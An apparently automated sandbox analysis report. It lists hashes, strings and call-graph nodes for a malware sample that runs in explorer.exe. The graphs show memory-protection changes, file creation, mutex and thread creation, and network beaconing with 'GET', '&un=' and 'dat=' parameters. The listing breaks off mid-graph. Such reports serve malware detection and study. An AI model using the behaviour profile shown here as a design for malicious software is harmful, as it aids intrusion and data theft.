                                • Opcode ID: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
                                • Instruction ID: e1650a682ee27013a11818285e0f8c5e74d617494d06113a53f383a19b2fcd1a
                                • Opcode Fuzzy Hash: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
                                • Instruction Fuzzy Hash: CCE10E302087429FD72DCF28D894B6ABBE4BB88314F144A5DF5A58B2E1D735D856CB42
                                Strings
                                • RTL: Re-Waiting, xrefs: 011B7BAC
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011B7B7F
                                • RTL: Resource at %p, xrefs: 011B7B8E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                • Opcode ID: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
                                • Instruction ID: a91fb0a753d1051d5ea198f9884b8ee185fc1198a308fa2d9ccc9c6a5a31793a
                                • Opcode Fuzzy Hash: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
                                • Instruction Fuzzy Hash: F041E2313097029FD728DE29C940B6AB7E5EF99B10F100A1DF95AD7780DB31E5058F96
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011B728C
                                Strings
                                • RTL: Re-Waiting, xrefs: 011B72C1
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011B7294
                                • RTL: Resource at %p, xrefs: 011B72A3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
                                • Instruction ID: 7d970548414c21649d9c471b49787a0bcf046a689a1d6e5f7c95ecce3b3f41da
                                • Opcode Fuzzy Hash: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
                                • Instruction Fuzzy Hash: 7141F031604206ABC729DE29CC81BAAB7B5FFA4714F100619F956AB3C0DB31E852CBD5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u
                                • API String ID: 48624451-3050659472
                                • Opcode ID: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
                                • Instruction ID: 59df2f3e9c5005c84ae6ad619095c4f6f4bbf069506ccd63b602cf81349ba877
                                • Opcode Fuzzy Hash: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
                                • Instruction Fuzzy Hash: 01316672A006199FDB28DF2DDC40BEEB7F8FB58614F444559E949E3240EB30DA458FA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-
                                • API String ID: 1302938615-2137968064
                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction ID: 3ed77d1a1ce381180f291ae0c832fcef4bcb33fd3867a52c4e20fe6b6ce0aa6d
                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                • Instruction Fuzzy Hash: 42919471E002169AEB2CEF6DC8816BEBBA5AF44720F64C51AE965E72C0D73099418F52
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
                                • Instruction ID: 43bc7339d5a2aecf149d4202c4e6b2eb593f6aca23cc6093a1b3160a2ecdd6d4
                                • Opcode Fuzzy Hash: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
                                • Instruction Fuzzy Hash: 94812C75D002699BDB39DB54CC44BEEBBB8AF08754F0041EAEA19B7280D7705E85CFA1

                                Execution Graph

                                Execution Coverage:2.3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:4.7%
                                Total number of Nodes:444
                                Total number of Limit Nodes:16
                                execution_graph 13921 effcfbf 13923 effd016 13921->13923 13922 effd0f0 13923->13922 13926 eff98f2 NtProtectVirtualMemory 13923->13926 13927 effd0bb 13923->13927 13924 effd0e8 13925 f000382 ObtainUserAgentString 13924->13925 13925->13922 13926->13927 13927->13924 13928 eff98f2 NtProtectVirtualMemory 13927->13928 13928->13924 13813 efff8be 13814 efff8c3 13813->13814 13815 efff9a6 13814->13815 13816 efff995 ObtainUserAgentString 13814->13816 13816->13815 13570 f004f82 13571 f004fb8 13570->13571 13572 f0015b2 socket 13571->13572 13573 f005081 13571->13573 13581 f005022 13571->13581 13572->13573 13574 f005134 13573->13574 13576 f005117 getaddrinfo 13573->13576 13573->13581 13575 f001732 connect 13574->13575 13577 f0051b2 13574->13577 13574->13581 13575->13577 13576->13574 13578 f0016b2 send 13577->13578 13577->13581 13580 f005729 13578->13580 13579 f0057f4 setsockopt recv 13579->13581 13580->13579 13580->13581 13742 effd0fb 13744 effd137 13742->13744 13743 effd2d5 13744->13743 13745 eff98f2 NtProtectVirtualMemory 13744->13745 13746 effd28a 13745->13746 13747 eff98f2 NtProtectVirtualMemory 13746->13747 13750 effd2a9 13747->13750 13748 effd2cd 13749 f000382 ObtainUserAgentString 13748->13749 13749->13743 13750->13748 13751 eff98f2 NtProtectVirtualMemory 13750->13751 13751->13748 13891 f005e0a 13892 f004942 13891->13892 13893 f005e45 NtProtectVirtualMemory 13892->13893 13894 f005e70 13893->13894 13752 effd2f4 13753 effd349 13752->13753 13754 effd49f 13753->13754 13756 eff98f2 NtProtectVirtualMemory 13753->13756 13755 eff98f2 NtProtectVirtualMemory 13754->13755 13759 effd4c3 13754->13759 13755->13759 13757 effd480 13756->13757 13758 eff98f2 NtProtectVirtualMemory 13757->13758 13758->13754 13760 eff98f2 NtProtectVirtualMemory 13759->13760 13761 effd597 13759->13761 13760->13761 13762 eff98f2 NtProtectVirtualMemory 13761->13762 13764 effd5bf 13761->13764 13762->13764 13763 effd6e1 13765 f000382 ObtainUserAgentString 13763->13765 13766 eff98f2 NtProtectVirtualMemory 13764->13766 13767 effd6b9 13764->13767 13768 effd6e9 13765->13768 13766->13767 13767->13763 13769 eff98f2 NtProtectVirtualMemory 13767->13769 13769->13763 13929 f006a4d 13930 f006a53 13929->13930 13933 effa782 13930->13933 13932 f006a6b 13935 effa78f 13933->13935 13934 effa7ad 13934->13932 13935->13934 13936 efff662 6 API calls 13935->13936 13936->13934 13770 eff90f1 13771 eff91d3 13770->13771 13772 eff9109 13770->13772 13773 eff9012 6 API calls 13772->13773 13774 eff9113 13773->13774 13774->13771 13775 f004f82 6 API calls 13774->13775 13775->13771 13895 effa5f1 13896 effa60e 13895->13896 13897 effa606 13895->13897 13898 efff662 6 API calls 13897->13898 13898->13896 13854 effa42e 13855 effa45b 13854->13855 13863 effa4c9 13854->13863 13856 f004232 NtCreateFile 13855->13856 13855->13863 13857 effa496 13856->13857 13858 effa4c5 13857->13858 13859 effa082 NtCreateFile 13857->13859 13860 f004232 NtCreateFile 13858->13860 13858->13863 13861 effa4b6 13859->13861 13860->13863 13861->13858 13862 eff9f52 NtCreateFile 13861->13862 13862->13858 13582 f005e12 13583 f005e45 NtProtectVirtualMemory 13582->13583 13586 f004942 13582->13586 13585 f005e70 13583->13585 13587 f004967 13586->13587 13587->13583 13937 effbb66 13939 effbb6a 13937->13939 13938 effbcce 13939->13938 13940 effbcb5 CreateMutexExW 13939->13940 13940->13938 13776 effece2 13778 effedd9 13776->13778 13777 efff022 13778->13777 13782 effe352 13778->13782 13780 effef0d 13780->13777 13791 effe792 13780->13791 13784 effe39e 13782->13784 13783 effe58e 13783->13780 13784->13783 13785 effe4ec 13784->13785 13787 effe595 13784->13787 13786 f004232 NtCreateFile 13785->13786 13789 effe4ff 13786->13789 13787->13783 13788 f004232 NtCreateFile 13787->13788 13788->13783 13789->13783 13790 f004232 NtCreateFile 13789->13790 13790->13783 13792 effe7e0 13791->13792 13793 f004232 NtCreateFile 13792->13793 13796 effe90c 13793->13796 13794 effeaf3 13794->13780 13795 effe352 NtCreateFile 13795->13796 13796->13794 13796->13795 13797 effe602 NtCreateFile 13796->13797 13797->13796 13899 f006a1f 13900 f006a25 13899->13900 13903 effa5f2 13900->13903 13902 f006a3d 13904 effa60e 13903->13904 13905 effa5fb 13903->13905 13904->13902 13905->13904 13906 efff662 6 API calls 13905->13906 13906->13904 13479 eff92dd 13483 eff931a 13479->13483 13480 eff93fa 13481 eff9328 SleepEx 13481->13481 13481->13483 13483->13480 13483->13481 13486 f003f12 13483->13486 13495 effa432 13483->13495 13505 eff90f2 13483->13505 13487 f003f48 13486->13487 13488 f004232 NtCreateFile 13487->13488 13489 f0040e9 13487->13489 13494 f004134 13487->13494 13511 f004f82 13487->13511 13488->13487 13490 f004125 13489->13490 13523 f003842 13489->13523 13531 f003922 13490->13531 13494->13483 13496 effa4c9 13495->13496 13497 effa45b 13495->13497 13496->13483 13497->13496 13498 f004232 NtCreateFile 13497->13498 13499 effa496 13498->13499 13500 effa4c5 13499->13500 13552 effa082 13499->13552 13500->13496 13502 f004232 NtCreateFile 13500->13502 13502->13496 13503 effa4b6 13503->13500 13561 eff9f52 13503->13561 13506 eff9109 13505->13506 13510 eff91d3 13505->13510 13566 eff9012 13506->13566 13508 eff9113 13509 f004f82 6 API calls 13508->13509 13508->13510 13509->13510 13510->13483 13512 f004fb8 13511->13512 13514 f005081 13512->13514 13522 f005022 13512->13522 13539 f0015b2 13512->13539 13515 f005134 13514->13515 13517 f005117 getaddrinfo 13514->13517 13514->13522 13518 f0051b2 13515->13518 13515->13522 13542 f001732 13515->13542 13517->13515 13518->13522 13545 f0016b2 13518->13545 13520 f0057f4 setsockopt recv 13520->13522 13521 f005729 13521->13520 13521->13522 13522->13487 13524 f00386d 13523->13524 13548 f004232 13524->13548 13526 f003906 13526->13489 13527 f003888 13527->13526 13528 f004f82 6 API calls 13527->13528 13529 f0038c5 13527->13529 13528->13529 13529->13526 13530 f004232 NtCreateFile 13529->13530 13530->13526 13532 f0039c2 13531->13532 13533 f004232 NtCreateFile 13532->13533 13536 f0039d6 13533->13536 13534 f003a9f 13534->13494 13535 f003a5d 13535->13534 13537 f004232 NtCreateFile 13535->13537 13536->13534 13536->13535 13538 f004f82 6 API calls 13536->13538 13537->13534 13538->13535 13540 f00160a socket 13539->13540 13541 f0015ec 13539->13541 13540->13514 13541->13540 13543 f001788 connect 13542->13543 13544 f00176a 13542->13544 13543->13518 13544->13543 13546 f001705 send 13545->13546 13547 f0016e7 13545->13547 13546->13521 13547->13546 13549 f00425c 13548->13549 13551 f004334 13548->13551 13550 f004410 NtCreateFile 13549->13550 13549->13551 13550->13551 13551->13527 13553 effa420 13552->13553 13554 effa0aa 13552->13554 13553->13503 13554->13553 13555 f004232 NtCreateFile 13554->13555 13556 effa1f9 13555->13556 13557 f004232 NtCreateFile 13556->13557 13560 effa3df 13556->13560 13558 effa3c9 13557->13558 13559 f004232 NtCreateFile 13558->13559 13559->13560 13560->13503 13562 eff9f70 13561->13562 13563 eff9f84 13561->13563 13562->13500 13564 f004232 NtCreateFile 13563->13564 13565 effa046 13564->13565 13565->13500 13567 eff9031 13566->13567 13568 eff90cd 13567->13568 13569 f004f82 6 API calls 13567->13569 13568->13508 13569->13568 13798 effcedd 13800 effcf06 13798->13800 13799 effcfa4 13800->13799 13801 eff98f2 NtProtectVirtualMemory 13800->13801 13802 effcf9c 13801->13802 13803 f000382 ObtainUserAgentString 13802->13803 13803->13799 13969 f0012e4 13970 f00136f 13969->13970 13971 f001305 13969->13971 13971->13970 13972 f0010c2 6 API calls 13971->13972 13972->13970 13907 effcdd9 13908 effcdf0 13907->13908 13909 f000382 ObtainUserAgentString 13908->13909 13910 effcecd 13908->13910 13909->13910 13941 f006aa9 13942 f006aaf 13941->13942 13945 f001212 13942->13945 13944 f006ac7 13946 f001237 13945->13946 13947 f00121b 13945->13947 13946->13944 13947->13946 13948 f0010c2 6 API calls 13947->13948 13948->13946 13911 f00022a 13912 f00025e 13911->13912 13913 efff8c2 ObtainUserAgentString 13912->13913 13914 f00026b 13913->13914 13804 effecd4 13806 effecd8 13804->13806 13805 efff022 13806->13805 13807 effe352 NtCreateFile 13806->13807 13808 effef0d 13807->13808 13808->13805 13809 effe792 NtCreateFile 13808->13809 13809->13808 13592 f005bac 13593 f005bb1 13592->13593 13626 f005bb6 13593->13626 13627 effbb72 13593->13627 13595 f005c2c 13596 f005c85 13595->13596 13598 f005c54 13595->13598 13599 f005c69 13595->13599 13595->13626 13597 f003ab2 NtProtectVirtualMemory 13596->13597 13602 f005c8d 13597->13602 13603 f003ab2 NtProtectVirtualMemory 13598->13603 13600 f005c80 13599->13600 13601 f005c6e 13599->13601 13600->13596 13605 f005c97 13600->13605 13604 f003ab2 NtProtectVirtualMemory 13601->13604 13663 effd102 13602->13663 13607 f005c5c 13603->13607 13608 f005c76 13604->13608 13609 f005c9c 13605->13609 13610 f005cbe 13605->13610 13649 effcee2 13607->13649 13655 effcfc2 13608->13655 13631 f003ab2 13609->13631 13613 f005cc7 13610->13613 13614 f005cd9 13610->13614 13610->13626 13616 f003ab2 NtProtectVirtualMemory 13613->13616 13617 f003ab2 NtProtectVirtualMemory 13614->13617 13614->13626 13619 f005ccf 13616->13619 13620 f005ce5 13617->13620 13673 effd2f2 13619->13673 13691 effd712 13620->13691 13629 effbb93 13627->13629 13628 effbcce 13628->13595 13629->13628 13630 effbcb5 CreateMutexExW 13629->13630 13630->13628 13633 f003adf 13631->13633 13632 f003ebc 13641 effcde2 13632->13641 13633->13632 13703 eff98f2 13633->13703 13635 f003e5c 13636 eff98f2 NtProtectVirtualMemory 13635->13636 13637 f003e7c 13636->13637 13638 eff98f2 NtProtectVirtualMemory 13637->13638 13639 f003e9c 13638->13639 13640 eff98f2 NtProtectVirtualMemory 13639->13640 13640->13632 13642 effcdf0 13641->13642 13644 effcecd 13642->13644 13726 f000382 13642->13726 13645 eff9412 13644->13645 13647 eff9440 13645->13647 13646 eff9473 13646->13626 13647->13646 13648 eff944d CreateThread 13647->13648 13648->13626 13651 effcf06 13649->13651 13650 effcfa4 13650->13626 13651->13650 13652 eff98f2 NtProtectVirtualMemory 13651->13652 13653 effcf9c 13652->13653 13654 f000382 ObtainUserAgentString 13653->13654 13654->13650 13657 effd016 13655->13657 13656 effd0f0 13656->13626 13657->13656 13660 eff98f2 NtProtectVirtualMemory 13657->13660 13661 effd0bb 13657->13661 13658 effd0e8 13659 f000382 ObtainUserAgentString 13658->13659 13659->13656 13660->13661 13661->13658 13662 eff98f2 NtProtectVirtualMemory 13661->13662 13662->13658 13665 effd137 13663->13665 13664 effd2d5 13664->13626 13665->13664 13666 eff98f2 NtProtectVirtualMemory 13665->13666 13667 effd28a 13666->13667 13668 eff98f2 NtProtectVirtualMemory 13667->13668 13671 effd2a9 13668->13671 13669 effd2cd 13670 f000382 ObtainUserAgentString 13669->13670 13670->13664 13671->13669 13672 eff98f2 NtProtectVirtualMemory 13671->13672 13672->13669 13674 effd349 13673->13674 13675 effd49f 13674->13675 13677 eff98f2 NtProtectVirtualMemory 13674->13677 13676 eff98f2 NtProtectVirtualMemory 13675->13676 13679 effd4c3 13675->13679 13676->13679 13678 effd480 13677->13678 13680 eff98f2 NtProtectVirtualMemory 13678->13680 13681 eff98f2 NtProtectVirtualMemory 13679->13681 13682 effd597 13679->13682 13680->13675 13681->13682 13683 eff98f2 NtProtectVirtualMemory 13682->13683 13685 effd5bf 13682->13685 13683->13685 13684 effd6e1 13686 f000382 ObtainUserAgentString 13684->13686 13687 eff98f2 NtProtectVirtualMemory 13685->13687 13688 effd6b9 13685->13688 13689 effd6e9 13686->13689 13687->13688 13688->13684 13690 eff98f2 NtProtectVirtualMemory 13688->13690 13689->13626 13690->13684 13692 effd767 13691->13692 13693 eff98f2 NtProtectVirtualMemory 13692->13693 13697 effd903 13692->13697 13694 effd8e3 13693->13694 13695 eff98f2 NtProtectVirtualMemory 13694->13695 13695->13697 13696 effd9b7 13698 f000382 ObtainUserAgentString 13696->13698 13699 eff98f2 NtProtectVirtualMemory 13697->13699 13700 effd992 13697->13700 13701 effd9bf 13698->13701 13699->13700 13700->13696 13702 eff98f2 NtProtectVirtualMemory 13700->13702 13701->13626 13702->13696 13704 eff9987 13703->13704 13707 eff99b2 13704->13707 13718 effa622 13704->13718 13706 eff9c0c 13706->13635 13707->13706 13708 eff9ba2 13707->13708 13711 eff9ac5 13707->13711 13709 f005e12 NtProtectVirtualMemory 13708->13709 13710 eff9b5b 13709->13710 13710->13706 13713 f005e12 NtProtectVirtualMemory 13710->13713 13722 f005e12 13711->13722 13713->13706 13714 eff9ae3 13714->13706 13715 eff9b3d 13714->13715 13716 f005e12 NtProtectVirtualMemory 13714->13716 13717 f005e12 NtProtectVirtualMemory 13715->13717 13716->13715 13717->13710 13720 effa67a 13718->13720 13719 effa67e 13719->13707 13720->13719 13721 f005e12 NtProtectVirtualMemory 13720->13721 13721->13720 13723 f005e45 NtProtectVirtualMemory 13722->13723 13724 f004942 13722->13724 13725 f005e70 13723->13725 13724->13723 13725->13714 13727 f0003c7 13726->13727 13730 f000232 13727->13730 13729 f000438 13729->13644 13731 f00025e 13730->13731 13734 efff8c2 13731->13734 13733 f00026b 13733->13729 13735 efff934 13734->13735 13736 efff9a6 13735->13736 13737 efff995 ObtainUserAgentString 13735->13737 13736->13733 13737->13736 13864 effa613 13866 effa620 13864->13866 13865 effa67e 13866->13865 13867 f005e12 NtProtectVirtualMemory 13866->13867 13867->13866 13810 f00172e 13811 f001788 connect 13810->13811 13812 f00176a 13810->13812 13812->13811 13868 f0069f1 13869 f0069f7 13868->13869 13872 effb852 13869->13872 13871 f006a0f 13873 effb865 13872->13873 13874 effb8e4 13872->13874 13873->13874 13875 effb887 13873->13875 13878 effb87e 13873->13878 13874->13871 13875->13874 13880 efff662 13875->13880 13876 f00136f 13876->13871 13878->13876 13879 f0010c2 6 API calls 13878->13879 13879->13876 13881 efff7ba 13880->13881 13882 efff66b 13880->13882 13881->13874 13882->13881 13883 eff90f2 6 API calls 13882->13883 13887 efff6ee 13883->13887 13884 efff750 13884->13881 13885 efff83f 13884->13885 13886 efff791 13884->13886 13885->13881 13889 f004f82 6 API calls 13885->13889 13886->13881 13890 f004f82 6 API calls 13886->13890 13887->13884 13888 f004f82 6 API calls 13887->13888 13888->13884 13889->13881 13890->13881 13588 f004232 13589 f00425c 13588->13589 13591 f004334 13588->13591 13590 f004410 NtCreateFile 13589->13590 13589->13591 13590->13591 13833 f0069b3 13834 f0069bd 13833->13834 13837 effb6d2 13834->13837 13836 f0069e0 13838 effb6f7 13837->13838 13839 effb704 13837->13839 13840 eff90f2 6 API calls 13838->13840 13841 effb6ff 13839->13841 13842 effb72d 13839->13842 13844 effb737 13839->13844 13840->13841 13841->13836 13846 f0012c2 13842->13846 13844->13841 13845 f004f82 6 API calls 13844->13845 13845->13841 13847 f0012cb 13846->13847 13848 f0012df 13846->13848 13847->13848 13850 f0010c2 13847->13850 13848->13841 13851 f0011f0 13850->13851 13852 f0010cb 13850->13852 13851->13848 13852->13851 13853 f004f82 6 API calls 13852->13853 13853->13851 13949 effe14a 13950 effe153 13949->13950 13955 effe174 13949->13955 13952 f000382 ObtainUserAgentString 13950->13952 13951 effe1e7 13953 effe16c 13952->13953 13954 eff90f2 6 API calls 13953->13954 13954->13955 13955->13951 13957 eff91f2 13955->13957 13958 eff920f 13957->13958 13961 eff92c9 13957->13961 13959 eff9242 13958->13959 13960 f003f12 7 API calls 13958->13960 13962 effa432 NtCreateFile 13959->13962 13964 eff9289 13959->13964 13960->13959 13961->13955 13962->13964 13963 eff90f2 6 API calls 13963->13961 13964->13961 13964->13963 13965 f0010b9 13966 f0010ed 13965->13966 13968 f0011f0 13965->13968 13967 f004f82 6 API calls 13966->13967 13966->13968 13967->13968 13817 f004f7a 13818 f004fb8 13817->13818 13819 f0015b2 socket 13818->13819 13820 f005081 13818->13820 13828 f005022 13818->13828 13819->13820 13821 f005134 13820->13821 13823 f005117 getaddrinfo 13820->13823 13820->13828 13822 f001732 connect 13821->13822 13826 f0051b2 13821->13826 13821->13828 13822->13826 13823->13821 13824 f0016b2 send 13827 f005729 13824->13827 13825 f0057f4 setsockopt recv 13825->13828 13826->13824 13826->13828 13827->13825 13827->13828 13915 f00383a 13916 f003841 13915->13916 13917 f004f82 6 API calls 13916->13917 13919 f0038c5 13917->13919 13918 f003906 13919->13918 13920 f004232 NtCreateFile 13919->13920 13920->13918

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 f004f82-f004fb6 1 f004fd6-f004fd9 0->1 2 f004fb8-f004fbc 0->2 4 f0058fe-f00590c 1->4 5 f004fdf-f004fed 1->5 2->1 3 f004fbe-f004fc2 2->3 3->1 6 f004fc4-f004fc8 3->6 7 f004ff3-f004ff7 5->7 8 f0058f6-f0058f7 5->8 6->1 9 f004fca-f004fce 6->9 10 f004ff9-f004ffd 7->10 11 f004fff-f005000 7->11 8->4 9->1 12 f004fd0-f004fd4 9->12 10->11 13 f00500a-f005010 10->13 11->13 12->1 12->5 14 f005012-f005020 13->14 15 f00503a-f005060 13->15 14->15 18 f005022-f005026 14->18 16 f005062-f005066 15->16 17 f005068-f00507c call f0015b2 15->17 16->17 19 f0050a8-f0050ab 16->19 22 f005081-f0050a2 17->22 18->8 21 f00502c-f005035 18->21 23 f0050b1-f0050b8 19->23 24 f005144-f005150 19->24 21->8 22->19 28 f0058ee-f0058ef 22->28 25 f0050e2-f0050f5 23->25 26 f0050ba-f0050dc call f004942 23->26 27 f005156-f005165 24->27 24->28 25->28 30 f0050fb-f005101 25->30 26->25 31 f005167-f005178 call f001552 27->31 32 f00517f-f00518f 27->32 28->8 30->28 34 f005107-f005109 30->34 31->32 36 f005191-f0051ad call f001732 32->36 37 f0051e5-f00521b 32->37 34->28 41 f00510f-f005111 34->41 43 f0051b2-f0051da 36->43 39 f00522d-f005231 37->39 40 f00521d-f00522b 37->40 45 f005233-f005245 39->45 46 f005247-f00524b 39->46 44 f00527f-f005280 40->44 41->28 47 f005117-f005132 getaddrinfo 41->47 43->37 48 f0051dc-f0051e1 43->48 52 f005283-f0052e0 call f005d62 call f002482 call f001e72 call f006002 44->52 45->44 49 f005261-f005265 46->49 50 f00524d-f00525f 46->50 47->24 51 f005134-f00513c 47->51 48->37 53 f005267-f00526b 49->53 54 f00526d-f005279 49->54 50->44 51->24 63 f0052e2-f0052e6 52->63 64 f0052f4-f005354 call f005d92 52->64 53->52 53->54 54->44 63->64 65 f0052e8-f0052ef call f002042 63->65 69 f00535a-f005396 call f005d62 call f006262 call f006002 64->69 70 f00548c-f0054b8 call f005d62 call f006262 64->70 65->64 85 f005398-f0053b7 call f006262 call f006002 69->85 86 f0053bb-f0053e9 call f006262 * 2 69->86 80 f0054d9-f005590 call f006262 * 3 call f006002 * 2 call f002482 70->80 81 f0054ba-f0054d5 70->81 109 f005595-f0055b9 call f006262 80->109 81->80 85->86 101 f005415-f00541d 86->101 102 f0053eb-f005410 call f006002 call f006262 86->102 103 f005442-f005448 101->103 104 f00541f-f005425 101->104 102->101 103->109 110 f00544e-f005456 103->110 107 f005467-f005487 call f006262 104->107 108 f005427-f00543d 104->108 107->109 108->109 120 f0055d1-f0056ad call f006262 * 7 call f006002 call f005d62 call f006002 call f001e72 call f002042 109->120 121 f0055bb-f0055cc call f006262 call f006002 109->121 110->109 115 f00545c-f00545d 110->115 115->107 132 f0056af-f0056b3 120->132 121->132 134 f0056b5-f0056fa call f001382 call f0017b2 132->134 135 f0056ff-f00572d call f0016b2 132->135 155 f0058e6-f0058e7 134->155 145 f00575d-f005761 135->145 146 f00572f-f005735 135->146 147 f005767-f00576b 145->147 148 f00590d-f005913 145->148 146->145 151 f005737-f00574c 146->151 152 f005771-f005773 147->152 153 f0058aa-f0058df call f0017b2 147->153 157 f005779-f005784 148->157 158 f005919-f005920 148->158 151->145 156 f00574e-f005754 151->156 152->153 152->157 153->155 155->28 156->145 163 f005756 156->163 159 f005795-f005796 157->159 160 f005786-f005793 157->160 158->160 164 f00579c-f0057a0 159->164 160->159 160->164 163->145 167 f0057b1-f0057b2 164->167 168 f0057a2-f0057af 164->168 170 f0057b8-f0057c4 167->170 168->167 168->170 173 f0057f4-f005861 setsockopt recv 170->173 174 f0057c6-f0057ef call f005d92 call f005d62 170->174 177 f0058a3-f0058a4 173->177 178 f005863 173->178 174->173 177->153 178->177 181 f005865-f00586a 178->181 181->177 182 f00586c-f005872 181->182 182->177 185 f005874-f0058a1 182->185 185->177 185->178
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: getaddrinforecvsetsockopt
                                • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                • API String ID: 1564272048-1117930895
                                • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                • Instruction ID: 8408bbead53c31db0e9f1c86a0b10b59258da86fcf51e7b217f1496ac2e37b37
                                • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                • Instruction Fuzzy Hash: 6C527F30618B088BEB69FF68C8847E9B7E1FB54300F54462ED49FDB186EE34A545CB85

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 299 f004232-f004256 300 f00425c-f004260 299->300 301 f0048bd-f0048cd 299->301 300->301 302 f004266-f0042a0 300->302 303 f0042a2-f0042a6 302->303 304 f0042bf 302->304 303->304 305 f0042a8-f0042ac 303->305 306 f0042c6 304->306 307 f0042b4-f0042b8 305->307 308 f0042ae-f0042b2 305->308 309 f0042cb-f0042cf 306->309 307->309 310 f0042ba-f0042bd 307->310 308->306 311 f0042d1-f0042f7 call f004942 309->311 312 f0042f9-f00430b 309->312 310->309 311->312 316 f004378 311->316 312->316 317 f00430d-f004332 312->317 318 f00437a-f0043a0 316->318 319 f0043a1-f0043a8 317->319 320 f004334-f00433b 317->320 321 f0043d5-f0043dc 319->321 322 f0043aa-f0043d3 call f004942 319->322 323 f004366-f004370 320->323 324 f00433d-f004360 call f004942 320->324 328 f004410-f004458 NtCreateFile call f004172 321->328 329 f0043de-f00440a call f004942 321->329 322->316 322->321 323->316 326 f004372-f004373 323->326 324->323 326->316 334 f00445d-f00445f 328->334 329->316 329->328 334->316 336 f004465-f00446d 334->336 336->316 337 f004473-f004476 336->337 338 f004486-f00448d 337->338 339 f004478-f004481 337->339 340 f0044c2-f0044ec 338->340 341 f00448f-f0044b8 call f004942 338->341 339->318 347 f0044f2-f0044f5 340->347 348 f0048ae-f0048b8 340->348 341->316 346 f0044be-f0044bf 341->346 346->340 349 f004604-f004611 347->349 350 f0044fb-f0044fe 347->350 348->316 349->318 351 f004500-f004507 350->351 352 f00455e-f004561 350->352 355 f004538-f004559 351->355 356 f004509-f004532 call f004942 351->356 357 f004616-f004619 352->357 358 f004567-f004572 352->358 362 f0045e9-f0045fa 355->362 356->316 356->355 360 f0046b8-f0046bb 357->360 361 f00461f-f004626 357->361 363 f0045a3-f0045a6 358->363 364 f004574-f00459d call f004942 358->364 365 f004739-f00473c 360->365 366 f0046bd-f0046c4 360->366 368 f004657-f00466b call f005e92 361->368 369 f004628-f004651 call f004942 361->369 362->349 363->316 371 f0045ac-f0045b6 363->371 364->316 364->363 375 f004742-f004749 365->375 376 f0047c4-f0047c7 365->376 372 f0046f5-f004734 366->372 373 f0046c6-f0046ef call f004942 366->373 368->316 391 f004671-f0046b3 368->391 369->316 369->368 371->316 379 f0045bc-f0045e6 371->379 395 f004894-f0048a9 372->395 373->348 373->372 383 f00477a-f0047bf 375->383 384 f00474b-f004774 call f004942 375->384 376->316 380 f0047cd-f0047d4 376->380 379->362 